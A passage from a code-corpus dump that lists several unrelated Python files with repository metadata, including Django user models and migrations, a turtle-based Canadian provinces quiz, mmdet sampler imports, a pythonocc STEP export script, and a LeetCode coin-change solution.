archiver = GameplayArchiver('conditional_layer_requests', conditional_layer_request_archive_schema,
add_to_archive_enable_functions=True)
def is_archive_enabled():
return archiver.enabled
def archive_layer_request_culling(request, action, objects_in_layer_count=None):
time_service = services.time_service()
if time_service.sim_timeline is None:
time = 'zone not running'
else:
time = time_service.sim_now
    entry = {'game_time':str(time), 'request':str(request),
'action':action.name,
'layer_hash':str(hex(request.conditional_layer.layer_name)),
'speed':request.speed.name,
'timer_interval':str(request.timer_interval),
'timer_object_count':str(request.timer_object_count),
'objects_in_layer_count':str(objects_in_layer_count) if objects_in_layer_count else ''}
archiver.archive(entry)
|
[
"[email protected]"
] | |
78de7289058ba6cd0376717e3c054543a4765a6e
|
dda618067f13657f1afd04c94200711c1920ea5f
|
/scoop/user/util/inlines.py
|
fae84630c7d38141cbccae33232c7d71bd188d6d
|
[] |
no_license
|
artscoop/scoop
|
831c59fbde94d7d4587f4e004f3581d685083c48
|
8cef6f6e89c1990e2b25f83e54e0c3481d83b6d7
|
refs/heads/master
| 2020-06-17T20:09:13.722360 | 2017-07-12T01:25:20 | 2017-07-12T01:25:20 | 74,974,701 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 952 |
py
|
# coding: utf-8
from django_inlines import inlines
from django_inlines.inlines import TemplateInline
from scoop.user.models import User
class UserInline(TemplateInline):
"""
    Inline for inserting a user
    Format: {{user id [style=link|etc.]}}
    Example: {{user 2490 style="link"}}
"""
inline_args = [{'name': 'style'}]
def get_context(self):
""" Renvoyer le contexte d'affichage du template """
identifier = self.value
style = self.kwargs.get('style', 'link')
        # Check that the requested user exists
user = User.objects.get_or_none(id=identifier)
return {'user': user, 'style': style}
def get_template_name(self):
""" Renvoyer le chemin du template """
base = super(UserInline, self).get_template_name()[0]
path = "user/%s" % base
return path
# Register the inline classes
inlines.registry.register('user', UserInline)
|
[
"[email protected]"
] | |
3f56e0b32438cf0782e92e5ea2de9f3379161e3d
|
679cbcaa1a48c7ec9a4f38fa42d2dc06d7e7b6ef
|
/main.py
|
d5f2cef309384ff826e8e3934d2f1a1e69578595
|
[] |
no_license
|
roblivesinottawa/canada_provinces_game
|
cb2242845e3dd3a3902c0f416ac1a4efa485aecf
|
2aa5c7236c2ac7381522b493fddf415ece9c3a87
|
refs/heads/main
| 2023-03-04T08:08:31.409489 | 2021-02-17T21:46:18 | 2021-02-17T21:46:18 | 339,863,158 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,000 |
py
|
import turtle
import pandas
screen = turtle.Screen()
screen.title("Canada Provinces Game")
image = "canada_map.gif"
screen.addshape(image)
turtle.shape(image)
data = pandas.read_csv("canada_provinces.csv")
all_provinces = data.province.to_list()
guessed = []
while len(guessed) < len(all_provinces):
    answer = screen.textinput(title=f"{len(guessed)} / {len(all_provinces)} Provinces Correct",
                              prompt="What's another province's name? ").title()
if answer == "Exit":
missing = []
for province in all_provinces:
if province not in guessed:
missing.append(province)
new_data = pandas.DataFrame(missing)
new_data.to_csv("provinces_to_learn.csv")
break
if answer in all_provinces:
        guessed.append(answer)
t = turtle.Turtle()
t.hideturtle()
t.penup()
province_data = data[data.province == answer]
t.goto(float(province_data.x), float(province_data.y))
t.write(answer)
# turtle.mainloop()
|
[
"[email protected]"
] | |
6605d4e27c4cb4a040af60508ae4e17b5382aed8
|
f594560136416be39c32d5ad24dc976aa2cf3674
|
/mmdet/core/bbox/samplers/__init__.py
|
f58505b59dca744e489328a39fdabb02a893fb51
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
ShiqiYu/libfacedetection.train
|
bd9eb472c2599cbcb2f028fe7b51294e76868432
|
dce01651d44d2880bcbf4e296ad5ef383a5a611e
|
refs/heads/master
| 2023-07-14T02:37:02.517740 | 2023-06-12T07:42:00 | 2023-06-12T07:42:00 | 245,094,849 | 732 | 206 |
Apache-2.0
| 2023-06-12T07:42:01 | 2020-03-05T07:19:23 |
Python
|
UTF-8
|
Python
| false | false | 827 |
py
|
# Copyright (c) OpenMMLab. All rights reserved.
from .base_sampler import BaseSampler
from .combined_sampler import CombinedSampler
from .instance_balanced_pos_sampler import InstanceBalancedPosSampler
from .iou_balanced_neg_sampler import IoUBalancedNegSampler
from .mask_pseudo_sampler import MaskPseudoSampler
from .mask_sampling_result import MaskSamplingResult
from .ohem_sampler import OHEMSampler
from .pseudo_sampler import PseudoSampler
from .random_sampler import RandomSampler
from .sampling_result import SamplingResult
from .score_hlr_sampler import ScoreHLRSampler
__all__ = [
'BaseSampler', 'PseudoSampler', 'RandomSampler',
'InstanceBalancedPosSampler', 'IoUBalancedNegSampler', 'CombinedSampler',
'OHEMSampler', 'SamplingResult', 'ScoreHLRSampler', 'MaskPseudoSampler',
'MaskSamplingResult'
]
|
[
"[email protected]"
] | |
78a54771d395abae7a5403a3cdbd6b176f71da9e
|
d4252920cf72df6973c31dad81aacd5d9ad6d4c6
|
/core_example/core_export_with_name.py
|
52b36666b3edfbf02e3adaec01909a7214c30acb
|
[] |
no_license
|
tnakaicode/GeomSurf
|
e1894acf41d09900906c8d993bb39e935e582541
|
4481180607e0854328ec2cca1a33158a4d67339a
|
refs/heads/master
| 2023-04-08T15:23:22.513937 | 2023-03-20T04:56:19 | 2023-03-20T04:56:19 | 217,652,775 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,697 |
py
|
import numpy as np
import sys
import time
import os
from OCC.Display.SimpleGui import init_display
from OCC.Core.gp import gp_Pnt
from OCC.Core.XSControl import XSControl_Writer, XSControl_WorkSession
from OCC.Core.XCAFApp import XCAFApp_Application
from OCC.Core.XCAFDoc import XCAFDoc_DocumentTool_ShapeTool
from OCC.Core.STEPCAFControl import STEPCAFControl_Writer
from OCC.Core.STEPControl import STEPControl_Writer, STEPControl_Reader
from OCC.Core.STEPControl import STEPControl_AsIs
from OCC.Core.Interface import Interface_Static_SetCVal
from OCC.Core.IFSelect import IFSelect_RetDone
from OCC.Core.TDF import TDF_LabelSequence, TDF_Label, TDF_Tool, TDF_Data
from OCC.Core.TDocStd import TDocStd_Document
from OCC.Core.TDataStd import TDataStd_Name, TDataStd_Name_GetID
from OCC.Core.TCollection import TCollection_AsciiString
from OCC.Core.TCollection import TCollection_ExtendedString
from OCC.Core.BRepPrimAPI import BRepPrimAPI_MakeBox
from OCC.Extend.DataExchange import write_step_file, read_step_file
from OCC.Extend.DataExchange import read_step_file_with_names_colors
from OCCUtils.Construct import make_plane, make_vertex, make_circle
# https://www.opencascade.com/doc/occt-7.4.0/refman/html/class_t_collection___extended_string.html
# https://www.opencascade.com/doc/occt-7.4.0/refman/html/class_x_c_a_f_app___application.html
# https://www.opencascade.com/doc/occt-7.4.0/refman/html/class_t_doc_std___document.html
class ExportCAFMethod (object):
def __init__(self, name="name", tol=1.0E-10):
self.name = name
self.writer = STEPCAFControl_Writer()
self.writer.SetNameMode(True)
self.doc = TDocStd_Document(
TCollection_ExtendedString("pythonocc-doc"))
#self.x_app = XCAFApp_Application.GetApplication()
# self.x_app.NewDocument(
# TCollection_ExtendedString("MDTV-CAF"), self.doc)
self.shape_tool = XCAFDoc_DocumentTool_ShapeTool(self.doc.Main())
Interface_Static_SetCVal("write.step.schema", "AP214")
def Add(self, shape, name="name"):
"""
STEPControl_AsIs translates an Open CASCADE shape to its highest possible STEP representation.
STEPControl_ManifoldSolidBrep translates an Open CASCADE shape to a STEP manifold_solid_brep or brep_with_voids entity.
STEPControl_FacetedBrep translates an Open CASCADE shape into a STEP faceted_brep entity.
STEPControl_ShellBasedSurfaceModel translates an Open CASCADE shape into a STEP shell_based_surface_model entity.
STEPControl_GeometricCurveSet translates an Open CASCADE shape into a STEP geometric_curve_set entity.
"""
label = self.shape_tool.AddShape(shape)
self.writer.Transfer(self.doc, STEPControl_AsIs)
def Write(self, filename=None):
if not filename:
filename = self.name
path, ext = os.path.splitext(filename)
if not ext:
ext = ".stp"
status = self.writer.Write(path + ext)
assert(status == IFSelect_RetDone)
if __name__ == "__main__":
display, start_display, add_menu, add_function_to_menu = init_display()
display.DisplayShape(gp_Pnt())
root = ExportCAFMethod(name="root")
root.Add(make_vertex(gp_Pnt()), name="pnt")
root.Add(make_plane(center=gp_Pnt(0, 0, 0)), name="pln0")
root.Add(make_plane(center=gp_Pnt(0, 0, 100)), name="pln1")
root.Add(make_circle(gp_Pnt(0, 0, 0), 100), name="circle")
root.Write()
display.FitAll()
box = BRepPrimAPI_MakeBox(10, 10, 10).Solid()
writer = STEPControl_Writer()
fp = writer.WS().TransferWriter().FinderProcess()
print(fp)
# start_display()
|
[
"[email protected]"
] | |
f8f06cef7eb7f8000f785ce17005caaadfb5e2b9
|
7241ebc05ce727585224b3a98b0824f99e63627d
|
/tool/parser/JsonParser.py
|
d6539c8d86cf5900ad1f23f9402586f492b77105
|
[] |
no_license
|
mabenteng/ai-kg-neo4j
|
ca0cc161244229821e3b89e516fb616828823609
|
713e978ffedda7986245307cace02fb7ec240acd
|
refs/heads/master
| 2021-10-20T03:50:43.583436 | 2019-02-25T14:25:11 | 2019-02-25T14:25:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,037 |
py
|
# -*- coding: utf-8 -*-
# coding=utf-8
"""
create_author : zhangcl
create_time : 2018-07-01
program : *_* parse the parameter and generate cypher *_*
"""
import json
class JsonParser:
"""
Parser of request parameter.
"""
def __init__(self):
"""
initialize local variables.
"""
self.jsondata = None
self.result = {}
def parseJson(self, queryparam):
"""
Parse the parameter string to json object .
:param queryparam: json string
The json object holds the detail of request all infomation.
"""
self.querystring = queryparam
flag = True
try:
self.jsondata = json.loads(queryparam)
self.result['code'] = 200
self.result['message'] = 'sucess'
except Exception as err:
flag = False
print err
self.result['code'] = 500
self.result['message'] = err.message
self.result['data'] = ''
return flag
|
[
"[email protected]"
] | |
bcc9f50e79bc76fc958fb5af4610f1cf265ea29f
|
a2dc75a80398dee58c49fa00759ac99cfefeea36
|
/bluebottle/projects/migrations/0087_merge_20190130_1355.py
|
705027f9fe948f888b16eb0437a1f45584ffd9db
|
[
"BSD-2-Clause"
] |
permissive
|
onepercentclub/bluebottle
|
e38b0df2218772adf9febb8c6e25a2937889acc0
|
2b5f3562584137c8c9f5392265db1ab8ee8acf75
|
refs/heads/master
| 2023-08-29T14:01:50.565314 | 2023-08-24T11:18:58 | 2023-08-24T11:18:58 | 13,149,527 | 15 | 9 |
BSD-3-Clause
| 2023-09-13T10:46:20 | 2013-09-27T12:09:13 |
Python
|
UTF-8
|
Python
| false | false | 341 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-01-30 12:55
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0086_auto_20190117_1007'),
('projects', '0086_merge_20190121_1425'),
]
operations = [
]
|
[
"[email protected]"
] | |
7023e5ecdc00bc0113342ae94985d9d03e3efcba
|
afc693a1095f99cc586770fbd5a65dd40f2d822f
|
/docs/conf.py
|
82c0e03d8f2804c1c403a6bc1943dfa63271cb9d
|
[
"LicenseRef-scancode-homebrewed",
"Beerware"
] |
permissive
|
ndkoch/ihatemoney
|
974f3b75d3bc2519d3c17f492d221da9fa780236
|
51bc76ecc5e310602216fb8eaa2ede2ab43b3d00
|
refs/heads/master
| 2020-09-27T00:03:31.320035 | 2019-12-09T00:19:22 | 2019-12-09T00:19:22 | 226,371,920 | 0 | 2 |
NOASSERTION
| 2019-12-09T00:19:23 | 2019-12-06T16:48:41 |
Python
|
UTF-8
|
Python
| false | false | 266 |
py
|
# coding: utf8
import sys, os
templates_path = ["_templates"]
source_suffix = ".rst"
master_doc = "index"
project = "I hate money"
copyright = "2011, The 'I hate money' team"
version = "1.0"
release = "1.0"
exclude_patterns = ["_build"]
pygments_style = "sphinx"
|
[
"[email protected]"
] | |
a138938f68658430a7186f241fa868fec2590e61
|
865bd5e42a4299f78c5e23b5db2bdba2d848ab1d
|
/Python/322.coin-change.135397822.ac.python3.py
|
5e9a0619060981526f9753a831b848d95c17ab70
|
[] |
no_license
|
zhiymatt/Leetcode
|
53f02834fc636bfe559393e9d98c2202b52528e1
|
3a965faee2c9b0ae507991b4d9b81ed0e4912f05
|
refs/heads/master
| 2020-03-09T08:57:01.796799 | 2018-05-08T22:01:38 | 2018-05-08T22:01:38 | 128,700,683 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,207 |
py
|
#
# [322] Coin Change
#
# https://leetcode.com/problems/coin-change/description/
#
# algorithms
# Medium (26.58%)
# Total Accepted: 92.2K
# Total Submissions: 346.9K
# Testcase Example: '[1]\n0'
#
#
# You are given coins of different denominations and a total amount of money
# amount. Write a function to compute the fewest number of coins that you need
# to make up that amount. If that amount of money cannot be made up by any
# combination of the coins, return -1.
#
#
#
# Example 1:
# coins = [1, 2, 5], amount = 11
# return 3 (11 = 5 + 5 + 1)
#
#
#
# Example 2:
# coins = [2], amount = 3
# return -1.
#
#
#
# Note:
# You may assume that you have an infinite number of each kind of coin.
#
#
# Credits:Special thanks to @jianchao.li.fighter for adding this problem and
# creating all test cases.
#
class Solution:
def coinChange(self, coins, amount):
"""
:type coins: List[int]
:type amount: int
:rtype: int
"""
MAX = float('inf')
dp = [0] + [MAX] * amount
for i in range(1, amount + 1):
dp[i] = min([dp[i - c] if i - c >= 0 else MAX for c in coins]) + 1
return [dp[amount], -1][dp[amount] == MAX]
|
[
"[email protected]"
] | |
59ec3812dd12a3af309dfdcc37161df0ee23d29f
|
2e89ff0a41c5ae40bc420e5d298504927ceed010
|
/anything/users/migrations/0001_initial.py
|
fdaae19b9ff03d88bd74ac05938ab739e8e817a4
|
[] |
no_license
|
darkblank/anything
|
6dc676b7a099ddfce0c511db9234715a4f0ca66c
|
17589f8988ed1cb6fa049962bfd3fbe57c392fba
|
refs/heads/master
| 2020-03-11T09:40:32.608171 | 2018-05-12T09:20:27 | 2018-05-12T09:20:27 | 129,918,989 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 989 |
py
|
# Generated by Django 2.0.3 on 2018-05-11 23:36
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=255, unique=True, verbose_name='email address')),
('nickname', models.CharField(max_length=20)),
('is_active', models.BooleanField(default=True)),
('is_admin', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
]
|
[
"[email protected]"
] |